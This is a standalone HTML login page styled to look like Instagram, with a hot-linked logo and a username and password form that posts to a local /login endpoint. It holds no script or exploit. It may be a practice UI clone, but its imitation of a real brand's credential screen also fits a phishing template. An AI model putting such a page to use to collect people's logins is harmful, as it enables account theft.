<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Instagram Login</title>
  <style>
    body {
      font-family: sans-serif;
      text-align: center;
    }

    .container {
      width: 500px;
      margin: 0 auto;
      padding: 20px;
    }

    img {
      width: 100px;
      height: 100px;
    }

    h1 {
      font-size: 2rem;
      margin-bottom: 20px;
    }

    form {
      margin-bottom: 20px;
    }

    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 10px;
    }

    input[type="checkbox"] {
      margin-right: 10px;
    }

    input[type="submit"] {
      width: 100%;
      background-color: #000;
      color: #fff;
      padding: 10px;
      cursor: pointer;
    }

    a {
      color: #000;
      text-decoration: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="https://i.imgur.com/zqpwkLQ.png" alt="Instagram logo">
    <h1>Instagram</h1>
    <form action="/login" method="post">
      <input type="text" name="username" placeholder="Username">
      <input type="password" name="password" placeholder="Password">
      <input type="checkbox" name="remember_me" id="remember_me">
      <label for="remember_me">Remember me</label>
      <input type="submit" value="Log in">
    </form>
    <a href="#">Forgot password?</a>
    <p>Don't have an account? <a href="#">Sign up</a></p>
  </div>
</body>
</html>
